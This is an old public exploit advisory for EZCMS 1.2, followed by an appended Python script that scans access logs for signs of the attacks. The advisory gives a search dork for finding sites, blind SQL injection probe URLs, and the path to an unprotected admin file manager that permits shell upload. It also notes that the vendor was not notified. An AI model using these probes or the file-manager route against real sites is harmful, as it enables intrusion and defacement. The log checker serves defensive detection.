-[*]+================================================================================+[*]-
-[*]+ EZCMS <= 1.2 Multiple Remote Vulnerabilities +[*]-
-[*]+================================================================================+[*]-

[*] Discovered By: t0pP8uZz
[*] Discovered On: 19 MAY 2008
[*] Script Download: http://eztechhelp.com
[*] DORK google/altavista: "Powered by EZCMS"

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

EZCMS (all versions to date) suffers from 2 remote vulnerabilities.

One of these is a blind SQL injection in "index.php": the "page" variable is injectable.
See the example below.

The second is an insecure file manager. The file manager is hidden away in admin; the devs
probably thought no one would find it.. but here I am telling you ;)
See more below.

[*] Blind SQL Injection:

http://site.com/index.php?page=1 and 1=1
http://site.com/index.php?page=1 and 1=2

[*] Arbitrary Remote File Manager Access:

http://site.com/ezcms/admin/filemanager/

[*] NOTE/TIP:

No exploit is coded for the blind injection, because there is no point: you can get an easy shell
through the file manager. If you're curious, though, use SQLMap (check SourceForge).

The "File Manager" is a very easy bug to use: just browse to site.com/ezcms/admin/filemanager/
(site.com being the actual site) and you can upload/edit/delete/move files/folders.

[*] GREETZ:

milw0rm.com, h4ck-y0u.org, CipherCrew !

[-] peace,

t0pP8uZz

-[*]+================================================================================+[*]-
-[*]+ EZCMS <= 1.2 Multiple Remote Vulnerabilities +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-14]
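
Added example (not part of the original advisory and not EZCMS code): a log check a site operator could run to spot requests matching the two issues described above. It assumes Apache combined-style access logs and that legitimate "page" values are plain integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style; not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [19/May/2008:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5120
203.0.113.9 - - [19/May/2008:10:00:07 +0000] "GET /index.php?page=1%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [19/May/2008:10:00:08 +0000] "GET /index.php?page=1 and 1=2 HTTP/1.1" 200 311
203.0.113.9 - - [19/May/2008:10:01:30 +0000] "GET /ezcms/admin/filemanager/ HTTP/1.1" 200 8042
198.51.100.7 - - [19/May/2008:10:02:00 +0000] "GET /ezcms/admin/filemanager/ HTTP/1.1" 403 199
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')
FILEMANAGER_PREFIX = "/ezcms/admin/filemanager/"  # path named in the advisory
INTEGER_RE = re.compile(r"[0-9]{1,10}")           # assumed legitimate form of "page"


def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, request, status = m.groups()
    parts = request.split(" ")
    if len(parts) < 3:
        return None
    # A raw, unencoded space in the URL splits the request into extra tokens,
    # so the target is everything between the method and the protocol.
    url = urlsplit(" ".join(parts[1:-1]))
    # A 2xx answer means the file manager was served to this client.
    if url.path.startswith(FILEMANAGER_PREFIX) and status.startswith("2"):
        return ip, "filemanager-served"
    if url.path.endswith("/index.php"):
        # parse_qs decodes %20 and "+", exposing "1 and 1=1" in clear form.
        for value in parse_qs(url.query, keep_blank_values=True).get("page", []):
            if not INTEGER_RE.fullmatch(value):
                return ip, "page-not-integer"
    return None


def scan(log_text):
    """Collect findings for every line of an access log."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The same integer allow-list, enforced in the application before the value reaches the query, closes the injection itself; the file manager needs authentication in front of the whole admin path.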